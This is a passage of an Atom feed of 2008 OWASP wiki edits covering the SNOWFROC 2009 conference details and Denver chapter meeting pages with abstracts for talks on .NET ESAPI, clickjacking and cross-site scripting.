*taxi from the airport to venue is about $50 USD&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Registration and Conference Fees==&lt;br /&gt;
&lt;br /&gt;
Due to the hard work of our organizers and the gracious support of our sponsors, SNOWFROC will once again be a FREE CONFERENCE!!!&lt;br /&gt;
&lt;br /&gt;
Despite the fact that this is a free conference, we still need you to register to ensure that we don't exceed venue capacity.&lt;br /&gt;
&lt;br /&gt;
[https://snowfroc.electricalchemy.net CLICK HERE TO REGISTER]&lt;br /&gt;
&lt;br /&gt;
==Conference Committee==&lt;br /&gt;
&lt;br /&gt;
OWASP Conferences Chair: Dave Wichers - Aspect Security - dave.wichers 'at' owasp.org&lt;br /&gt;
&lt;br /&gt;
SNOWFROC 2009 Planning Committee Chair: Kathy Thaxton -  kthaxton 'at' owasp.org&lt;br /&gt;
&lt;br /&gt;
Colorado Chapter Hosts:&lt;br /&gt;
* David Campbell - OWASP Denver - dcampbell 'at' owasp.org&lt;br /&gt;
* Eric Duprey - OWASP Denver - eduprey 'at' exploits.org&lt;br /&gt;
&lt;br /&gt;
Vendor Exhibition Chair: Kathy Thaxton - kthaxton 'at' owasp.org&lt;br /&gt;
&lt;br /&gt;
Capture the Flag Chair: Eric Duprey - eduprey 'at' exploits.org&lt;br /&gt;
&lt;br /&gt;
CFP Chair: David Campbell - OWASP Denver - dcampbell 'at' owasp.org&lt;br /&gt;
&lt;br /&gt;
==[[OWASP AppSec Conference Sponsors | Conference Sponsors]]==&lt;br /&gt;
&lt;br /&gt;
The following organizations are proud sponsors of this conference:&lt;br /&gt;
*Accuvant&lt;br /&gt;
*Breach&lt;br /&gt;
*Business Partner Solutions&lt;br /&gt;
*Denim Group&lt;br /&gt;
&amp;lt;!-- *Dirsec --&amp;gt;&lt;br /&gt;
*Fishnet Security&lt;br /&gt;
&amp;lt;!-- *Fortify --&amp;gt;&lt;br /&gt;
*IBM&lt;br /&gt;
*Imperva&lt;br /&gt;
*Laz&lt;br /&gt;
*Lares&lt;br /&gt;
&amp;lt;!-- *Symplify --&amp;gt;&lt;br /&gt;
*Trustwave&lt;br /&gt;
*WhiteHat Security&lt;br /&gt;
&lt;br /&gt;
If you are interested in sponsoring this OWASP conference, please contact Kathy Thaxton at kthaxton 'at' owasp.org.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
More information about conference sponsorship is available [[OWASP AppSec Conference Sponsors | here]].&lt;br /&gt;
&lt;br /&gt;
[[Category:OWASP AppSec Conference]]&lt;/div&gt;</summary>
		<author><name>Eduprey</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Denver_October_2008_meeting&amp;diff=44358</id>
		<title>Denver October 2008 meeting</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Denver_October_2008_meeting&amp;diff=44358"/>
				<updated>2008-10-22T04:29:39Z</updated>
		
		<summary type="html">&lt;p&gt;Eduprey: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=== Centralized Security Functionality In a .NET World – The OWASP .NET ESAPI Project ===&lt;br /&gt;
&lt;br /&gt;
[https://www.owasp.org/images/e/e3/OWASP_.NET_ESAPI.zip Slide Deck]&lt;br /&gt;
&lt;br /&gt;
The Enterprise Security Application Programming Interface, or ESAPI, is a one-stop security shop for developers looking to implement security mechanisms in their code. The brainchild of Jeff Williams, one of the founders of OWASP, the ESAPI is an open source project that has gained traction with organizations looking to implement secure applications using tried and tested code that is also well organized and consistent. It includes functionality for validating and encoding data, authenticating and authorizing users, logging, error handling, and more. The API includes a Java reference implementation that can be extended to allow any organization to integrate security functionality into their Java/JEE applications.&lt;br /&gt;
&lt;br /&gt;
But what about .NET? Many organizations are banking on the powerful Microsoft programming framework to help them deliver robust and secure software. However, like Java, .NET tends to leave it up to the end-user programmers to get security code right. The OWASP .NET ESAPI project intends to help .NET developers avoid introducing security vulnerabilities into their code by providing a full port of the original ESAPI project from Java to C#.&lt;br /&gt;
&lt;br /&gt;
This talk will explore the gains, gripes, and gotchas of converting the ESAPI to .NET from the .NET ESAPI project lead himself. It will discuss features of the .NET frameworks security model, key differences between the Java and .NET platforms, and ASP.NET web security issues. Additionally, future ideas for .NET specific functionality will be proposed and discussed. Participation and feedback from the attendees is expected and encouraged.&lt;br /&gt;
&lt;br /&gt;
=== Speaker: Alex Smolen of Foundstone ===&lt;br /&gt;
=== Alex Smolen of Foundstone ===&lt;br /&gt;
 &lt;br /&gt;
Alex Smolen is a Software Security Consultant at Foundstone, where he provides security consulting services to clients to help find, fix, and prevent security vulnerabilities in enterprise software.  His duties include threat modeling, code review, penetration testing, and secure software development lifecycle (S-SDLC) design and implementation. He is also an instructor for the Writing Secure Code, Building Secure Software, and Ultimate Web Hacking courses. &lt;br /&gt;
 &lt;br /&gt;
Experience &lt;br /&gt;
Alex has been working in software development for a decade and has participated in and led several development projects in ASP.NET, Java, and Ruby on Rails. His primary interests include the integration of security into software development life cycles, evaluating the business impact of information security, and the security of emerging technologies. Alex is a contributing member of the software security community and has participated in several open-source security projects. &lt;br /&gt;
 &lt;br /&gt;
Prior to joining Foundstone, Alex was the Security Solutions Manager at Parasoft Corporation, &lt;br /&gt;
where he led the development of tools and methodologies for helping clients ensure application &lt;br /&gt;
security from the ground up. &lt;br /&gt;
 &lt;br /&gt;
Notable Accomplishments &lt;br /&gt;
Alex is one of 24 recipients worldwide of the Microsoft MVP Award for Visual Developer, Security &lt;br /&gt;
Alex has spoken at the following conferences: &lt;br /&gt;
• Enterprise Architect Summit, 2005 &lt;br /&gt;
&lt;br /&gt;
• Better Software, 2005 &lt;br /&gt;
&lt;br /&gt;
• OWASP Conference, 2005 &lt;br /&gt;
&lt;br /&gt;
• SD West, 2007 &lt;br /&gt;
&lt;br /&gt;
• SD Best Practices, 2007 &lt;br /&gt;
&lt;br /&gt;
Alex has published the following articles: &lt;br /&gt;
• Enterprise Architect, “Is Your Application Security Up to Spec?” &lt;br /&gt;
• Java Developers Journal, “How to Create Secure Web Applications With Struts” &lt;br /&gt;
&lt;br /&gt;
Alex is the author of [http://www.foundstone.com/us/resources/proddesc/hacmecasino.htm Hacme Casino], available on Foundstone’s web site. &lt;br /&gt;
 &lt;br /&gt;
Professional Education &lt;br /&gt;
&lt;br /&gt;
Alex graduated from the University of California, Berkeley, with a BS in Electrical Engineering and Computer Science (EECS). &lt;br /&gt;
&lt;br /&gt;
=== Hack of the Month: ClickJacking ===&lt;br /&gt;
&lt;br /&gt;
A brief introduction to Browser UI redress attacks (known as ClickJacking) was presented by Eric Duprey&lt;br /&gt;
&lt;br /&gt;
[https://www.owasp.org/images/2/24/0808_Denver_Clickjacking.zip Slide Deck]&lt;br /&gt;
&lt;br /&gt;
[https://www.owasp.org/index.php/Denver Back to OWASP Denver]&lt;/div&gt;</summary>
		<author><name>Eduprey</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=File:0808_Denver_Clickjacking.zip&amp;diff=44357</id>
		<title>File:0808 Denver Clickjacking.zip</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=File:0808_Denver_Clickjacking.zip&amp;diff=44357"/>
				<updated>2008-10-22T04:26:13Z</updated>
		
		<summary type="html">&lt;p&gt;Eduprey: Intro to clickjacking deck from OWASP Denver Oct 2008&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Intro to clickjacking deck from OWASP Denver Oct 2008&lt;/div&gt;</summary>
		<author><name>Eduprey</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Denver&amp;diff=28826</id>
		<title>Denver</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Denver&amp;diff=28826"/>
				<updated>2008-05-03T02:47:31Z</updated>
		
		<summary type="html">&lt;p&gt;Eduprey: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;{{Chapter Template|chaptername=Denver|extra=Chapter leaders are [mailto:eduprey@gmail.com Eric Duprey] and [mailto:owasp@electricalchemy.org David Campbell].   |mailinglistsite=http://lists.owasp.org/mailman/listinfo/owasp-denver|emailarchives=http://lists.owasp.org/pipermail/owasp-denver}}&lt;br /&gt;
&lt;br /&gt;
== Special Event! Front Range OWASP Conference, 10 June 2008! ==&lt;br /&gt;
The Denver OWASP Chapter, in conjunction with the Boulder OWASP Chapter, is proud to present the FROC this June.  We have an assortment of top notch speakers but have managed to keep this a *free conference*!  Please register now at the [http://froc.us FROC website]&lt;br /&gt;
&lt;br /&gt;
== Next Meeting ==&lt;br /&gt;
&lt;br /&gt;
'''The next meeting of the DENVER OWASP chapter will be held Wednesday 21 May 2008 at Raytheon Polar Services, 7400 S. Tucson Way, Centennial, CO 80112.  [[http://xrl.us/bhyyk gMaps Link]]&lt;br /&gt;
&lt;br /&gt;
=== Topic: Cross Site Scripting, Exploits and Defenses===&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Agenda:&lt;br /&gt;
&lt;br /&gt;
6-6:30  Dinner (at RPSC; provided by [http://www.fishnetsecurity.com/ Fishnet Security].&lt;br /&gt;
&lt;br /&gt;
6:30 - 6:40  Chapter business&lt;br /&gt;
&lt;br /&gt;
6:40 - 8:00  Presentation and Q&amp;amp;A&lt;br /&gt;
&lt;br /&gt;
Following the meeting we will have informal discussions over beverages at a local pub TBD.&lt;br /&gt;
&lt;br /&gt;
=== '''Speakers''' ===&lt;br /&gt;
&lt;br /&gt;
Chapter leaders David Campbell and Eric Duprey will be presenting on the up and coming threat of cross site scripting (XSS) vulnerabilities.&lt;br /&gt;
&lt;br /&gt;
For a long time, the impact of XSS vulnerabilities has been grossly underestimated. During this presentation, we will demonstrate exactly how effective XSS vulns can be.  We intend to make this presentation interactive, so bring a laptop and be prepared to join in the fun.&lt;br /&gt;
&lt;br /&gt;
David Campbell is a ten plus year veteran of the infosec industry, with experience ranging from penetration testing for Fortune-100's to architecting security solutions for large multinational financials to security consulting for US government agencies.  DC is presently head of security engineering for Raytheon Polar Services, and is also on the board of directors of Psiframe Inc., a San Francisco based security consultancy. &lt;br /&gt;
&lt;br /&gt;
Eric Duprey is a Senior Security Engineer for Dish Network Corporation.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
===Questions, Comments===&lt;br /&gt;
Questions can be directed to &lt;br /&gt;
*[mailto:dcampbell@owasp.org David Campbell, Denver OWASP] +1 415 377 7379&lt;br /&gt;
*[mailto:eduprey@gmail.com Eric Duprey, Denver OWASP]&lt;br /&gt;
&lt;br /&gt;
== Future Meetings == &lt;br /&gt;
[https://www.owasp.org/index.php/Denver#Next_Meeting May 21 2008]&lt;br /&gt;
&lt;br /&gt;
== Past Meetings ==&lt;br /&gt;
&lt;br /&gt;
[[Denver April 2008 meeting|April 2008]]&lt;br /&gt;
&lt;br /&gt;
[[Denver February 2008 meeting|February 2008]]&lt;br /&gt;
&lt;br /&gt;
[[Denver June 2007 meeting|June 2007]]&lt;br /&gt;
&lt;br /&gt;
[[Denver April 2007 meeting|April 2007]]&lt;br /&gt;
&lt;br /&gt;
[[Denver February 2007 meeting|February 2007]]&lt;br /&gt;
&lt;br /&gt;
[[Denver January 2007 meeting|January 2007]]&lt;br /&gt;
&lt;br /&gt;
[[Denver November 2006 meeting|November 2006]]&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
==Chapter Planning Pages==&lt;br /&gt;
[[Front Range Web Application Security Summit Planning Page|Front Range Web Application Security Summit Planning]]&lt;/div&gt;</summary>
		<author><name>Eduprey</name></author>	</entry>

	</feed>